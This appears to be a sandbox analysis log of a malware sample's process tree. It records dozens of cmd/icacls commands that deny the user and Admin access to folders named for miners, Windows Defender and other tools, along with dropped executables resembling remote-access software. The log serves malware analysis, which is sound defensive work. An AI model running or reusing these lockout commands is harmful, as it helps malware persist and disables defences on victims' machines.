C:\Windows\SysWOW64\icacls.exeicacls E:\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls K:\Windowsdata /deny %username%:(OI)(CI)(F)2⤵PID:2760
-
C:\Windows\SysWOW64\icacls.exeicacls K:\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4076
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Windowsdata /deny %username%:(OI)(CI)(F)2⤵PID:5040
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Windowsdata /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\disk /deny %username%:(OI)(CI)(F)2⤵PID:4560
-
C:\Windows\SysWOW64\icacls.exeicacls C:\disk /deny Admin:(OI)(CI)(F)3⤵PID:3876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Logs /deny %username%:(OI)(CI)(F)2⤵PID:2244
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Logs /deny Admin:(OI)(CI)(F)3⤵PID:4324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\min /deny %username%:(OI)(CI)(F)2⤵PID:1400
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\min /deny Admin:(OI)(CI)(F)3⤵PID:3804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\hs_module /deny %username%:(OI)(CI)(F)2⤵PID:1236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4464
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\hs_module /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\oracle /deny %username%:(OI)(CI)(F)2⤵PID:420
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\oracle /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\WindowsSQL /deny %username%:(OI)(CI)(F)2⤵PID:4584
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\WindowsSQL /deny Admin:(OI)(CI)(F)3⤵PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\DirectX11b /deny %username%:(OI)(CI)(F)2⤵PID:1108
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DirectX11b /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Framework /deny %username%:(OI)(CI)(F)2⤵PID:3016
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Framework /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1536
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\system32 /deny %username%:(OI)(CI)(F)2⤵PID:3272
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\system32 /deny Admin:(OI)(CI)(F)3⤵PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\AudioHDriver /deny %username%:(OI)(CI)(F)2⤵PID:3192
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:360
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\AudioHDriver /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5012
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\windowsdriver /deny %username%:(OI)(CI)(F)2⤵PID:1404
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5044
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\windowsdriver /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\WindowsDefender /deny %username%:(OI)(CI)(F)2⤵PID:4996
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\WindowsDefender /deny Admin:(OI)(CI)(F)3⤵PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\programdata\DriversI /deny %username%:(OI)(CI)(F)2⤵PID:1132
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2344
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\system32\hs /deny %username%:(OI)(CI)(F)2⤵PID:3836
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\windows\rss /deny %username%:(OI)(CI)(F)2⤵PID:1488
-
C:\Windows\SysWOW64\icacls.exeicacls C:\windows\rss /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\generictools /deny %username%:(OI)(CI)(F)2⤵PID:1952
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4076
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\generictools /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\PCBooster /deny %username%:(OI)(CI)(F)2⤵PID:4856
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3076
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)3⤵PID:4956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\unityp /deny %username%:(OI)(CI)(F)2⤵PID:2760
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4476
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\unityp /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4664
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\AMD /deny %username%:(OI)(CI)(F)2⤵PID:2788
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4544
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\AMD /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:2004
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xmarin /deny %username%:(OI)(CI)(F)2⤵PID:2288
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:168
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\comdev /deny %username%:(OI)(CI)(F)2⤵PID:4380
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wupdate /deny %username%:(OI)(CI)(F)2⤵PID:4464
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4144
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\monotype /deny %username%:(OI)(CI)(F)2⤵PID:2108
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:420
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\monotype /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xpon /deny %username%:(OI)(CI)(F)2⤵PID:4584
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\xpon /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:624
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wmipr /deny %username%:(OI)(CI)(F)2⤵PID:3960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4156
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4240
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\kara /deny %username%:(OI)(CI)(F)2⤵PID:3008
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3852
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\kara /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\syslog /deny %username%:(OI)(CI)(F)2⤵PID:5012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3532
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)3⤵PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\temp\wup /deny %username%:(OI)(CI)(F)2⤵PID:5004
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\temp\wup /deny Admin:(OI)(CI)(F)3⤵PID:5108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny %username%:(OI)(CI)(F)2⤵PID:3408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3360
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:1736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\geckof /deny %username%:(OI)(CI)(F)2⤵PID:2148
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:2124
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\initwin /deny %username%:(OI)(CI)(F)2⤵PID:3752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4596
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4328
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\packagest /deny %username%:(OI)(CI)(F)2⤵PID:3324
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:2712
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\subdir /deny %username%:(OI)(CI)(F)2⤵PID:2408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4620
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\subdir /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\syscore /deny %username%:(OI)(CI)(F)2⤵PID:208
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5040
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\syscore /deny Admin:(OI)(CI)(F)3⤵PID:1600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\windowscore /deny %username%:(OI)(CI)(F)2⤵PID:4588
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\windowscore /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2108
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny %username%:(OI)(CI)(F)2⤵PID:3828
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Macromedia /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny %username%:(OI)(CI)(F)2⤵PID:3296
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2268
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft software /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3960
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny %username%:(OI)(CI)(F)2⤵PID:600
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny %username%:(OI)(CI)(F)2⤵PID:4680
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny Admin:(OI)(CI)(F)3⤵PID:4912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny %username%:(OI)(CI)(F)2⤵PID:4552
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\coretempapp /deny Admin:(OI)(CI)(F)3⤵PID:4572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kryptex /deny %username%:(OI)(CI)(F)2⤵PID:1236
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\kryptex /deny Admin:(OI)(CI)(F)3⤵PID:768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\system /deny %username%:(OI)(CI)(F)2⤵PID:3492
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\system /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:828
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny %username%:(OI)(CI)(F)2⤵PID:2232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1604
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny %username%:(OI)(CI)(F)2⤵PID:5004
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4992
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)2⤵PID:2984
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny %username%:(OI)(CI)(F)2⤵PID:4216
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1736
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny Admin:(OI)(CI)(F)3⤵PID:884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)2⤵PID:4728
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2340
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny %username%:(OI)(CI)(F)2⤵PID:4080
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\gplyra /deny %username%:(OI)(CI)(F)2⤵PID:3752
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\gplyra /deny Admin:(OI)(CI)(F)3⤵PID:4516
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\intel /deny %username%:(OI)(CI)(F)2⤵PID:2800
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\intel /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\app /deny %username%:(OI)(CI)(F)2⤵PID:4376
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:516
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\app /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:4400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny %username%:(OI)(CI)(F)2⤵PID:4076
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4412
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny Admin:(OI)(CI)(F)3⤵PID:4588
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\isminer /deny %username%:(OI)(CI)(F)2⤵PID:1596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4136
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)3⤵PID:3048
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemcare /deny %username%:(OI)(CI)(F)2⤵PID:3828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1428
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4156
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny %username%:(OI)(CI)(F)2⤵PID:2760
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:3424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kyubey /deny %username%:(OI)(CI)(F)2⤵PID:4204
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4084
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny %username%:(OI)(CI)(F)2⤵PID:768
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)3⤵PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)2⤵PID:4012
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2844
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:488
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny %username%:(OI)(CI)(F)2⤵PID:4532
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:3400
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)2⤵PID:4584
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)(F)2⤵PID:4236
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:828
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)(F)3⤵PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny %username%:(OI)(CI)(F)2⤵PID:2300
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
PID:2984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\bvhost /deny %username%:(OI)(CI)(F)2⤵PID:5004
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3408
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\bvhost /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1804
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny %username%:(OI)(CI)(F)2⤵PID:2580
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)3⤵PID:2792
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\setupsk /deny %username%:(OI)(CI)(F)2⤵PID:3876
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\setupsk /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Svcms /deny %username%:(OI)(CI)(F)2⤵PID:3708
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2712
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3868
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny %username%:(OI)(CI)(F)2⤵PID:4540
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4080
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Users\Admin\AppData\Roaming\crmsvc /deny Admin:(OI)(CI)(F)3⤵
- Possible privilege escalation attempt
PID:4956
-
-
-
C:\Programdata\Windows\rutserv.exeC:\Programdata\Windows\rutserv.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4344 -
C:\Programdata\Windows\rfusclient.exeC:\Programdata\Windows\rfusclient.exe2⤵
- Executes dropped EXE
PID:4088 -
C:\Programdata\Windows\rfusclient.exeC:\Programdata\Windows\rfusclient.exe /tray3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:2812
-
-
-
C:\Programdata\Windows\rfusclient.exeC:\Programdata\Windows\rfusclient.exe /tray2⤵
- Executes dropped EXE
PID:4092
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4700
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k networkservice -s TermService1⤵PID:2440
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe1⤵
- Executes dropped EXE
PID:700
-
